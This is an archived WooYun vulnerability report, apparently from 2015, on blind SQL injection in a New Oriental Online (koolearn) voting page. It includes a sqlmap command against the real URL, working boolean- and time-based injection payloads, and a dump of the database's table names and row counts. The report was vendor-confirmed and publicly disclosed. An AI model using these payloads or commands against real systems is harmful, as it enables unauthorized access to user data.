
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0157630

Title: MySQL blind injection on a 新东方在线 (New Oriental Online) site

Vendor: 新东方 (New Oriental)

Author: hecate

Submitted: 2015-12-02 17:20

Fixed: 2016-01-17 11:32

Published: 2016-01-17 11:32

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2015-12-02: Details sent to the vendor, awaiting vendor action
2015-12-03: Vendor confirmed; details disclosed to the vendor only
2015-12-13: Details disclosed to core white hats and domain experts
2015-12-23: Details disclosed to regular white hats
2016-01-02: Details disclosed to intern white hats
2016-01-17: Details disclosed to the public

Brief description:

20,000+ users

Details:

sqlmap -u "http://ksec.koolearn.com/kyds2015/aps" --data "schoolName=%E8%A5%BF%E5%AE%89%E5%BB%BA%E7%AD%91%E7%A7%91%E6%8A%80%E5%A4%A7%E5%AD%A6&realName=%E7%8E%8B&provincesStr=%E9%99%95%E8%A5%BF&pageNum=1&pageSize=20&area=3&createTimeSort=1&voteSort=0&sortFlag=true"
Both the schoolName and realName parameters are injectable.


Parameter: schoolName (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: schoolName=%E8%A5%BF%E5%AE%89%E5%BB%BA%E7%AD%91%E7%A7%91%E6%8A%80%E5%A4%A7%E5%AD%A6%' AND 5238=5238 AND '%'='&realName=%E7%8E%8B&provincesStr=%E9%99%95%E8%A5%BF&pageNum=1&pageSize=20&area=3&createTimeSort=1&voteSort=0&sortFlag=true
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: schoolName=%E8%A5%BF%E5%AE%89%E5%BB%BA%E7%AD%91%E7%A7%91%E6%8A%80%E5%A4%A7%E5%AD%A6%' AND (SELECT * FROM (SELECT(SLEEP(5)))upqD) AND '%'='&realName=%E7%8E%8B&provincesStr=%E9%99%95%E8%A5%BF&pageNum=1&pageSize=20&area=3&createTimeSort=1&voteSort=0&sortFlag=true


[Screenshot: 11.png]

Proof of vulnerability:

Database: sub2013
+-----------------------------+---------+
| Table | Entries |
+-----------------------------+---------+
| vote_relation_info | 10263149 |
| enbf_user_action | 86347 |
| sub_kouyu_pingce | 62859 |
| messageboard_content | 55621 |
| sub_beizhan_yasi | 31847 |
| enbf_user_test_result | 28643 |
| enbf_vedio_click | 22430 |
| sub_tuofu_pindao | 15759 |
| sub_kyinformationcount | 15306 |
| bak_sub_dream_2014 | 13350 |
| sub_kyds_user | 10958 |
| sub_kyds2015_user | 9447 |
| sub_courseplan_information | 5773 |
| sub_dream_2014_20150917_bak | 5433 |
| sub_dream_2014_20150423_bak | 4331 |
| sub_dream_2014_20140825_bak | 4024 |
| sub_zhichengyingyu | 3014 |
| sub_ysfjzchtf | 2576 |
| sub_kyds2015_school | 2574 |
| vote_info | 2301 |
| sub_kyds2015_user_picture | 2104 |
| sub_dream_2014 | 2075 |
| sub_zhiying_shaoer | 1892 |
| sub_kaoyan_test | 1701 |
| sub_kouyu_pingce_bak | 1205 |
| sub_general_shaifen | 1066 |
| sub_form_guide_fields | 471 |
| sub_kyds2015_user_daily | 273 |
| sub_bmfjzchtf | 236 |
| enbf_dictation | 153 |
| sub_kyds_recommend_user | 133 |
| sub_kaoyan_counseling | 82 |
| q_option | 59 |
| enbf_media | 58 |
| config_info | 33 |
| white_list | 32 |
| app_tollgate | 26 |
| sub_asia | 25 |
| q_question | 21 |
| q_result | 21 |
| sub_form_guide | 21 |
| sub_qipeiyingyu | 18 |
| enbf_user_action_bak | 15 |
| enbf_competition | 13 |
| app_grade | 10 |
| rule_description | 10 |
| sub_europe | 5 |
| q_part | 4 |
| q_questionnaire | 4 |
| q_user_log | 4 |
| sub_kyds2015_role | 4 |
| enbf_article | 3 |
| enbf_dictionary | 3 |
| module_info | 3 |
| app_userinfo | 2 |
| messageboard_active | 2 |
| sub_leyu | 2 |
| sub_mba | 2 |
| vote_active_info | 2 |
| app_record | 1 |
+-----------------------------+---------+

Fix recommendation:

Filter the input.

Copyright notice: please credit hecate@乌云 (WooYun) when reproducing.


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 18

Confirmed: 2015-12-03 11:31

Vendor reply:

Thank you for the report; we will handle it as soon as possible!

Latest status:

None yet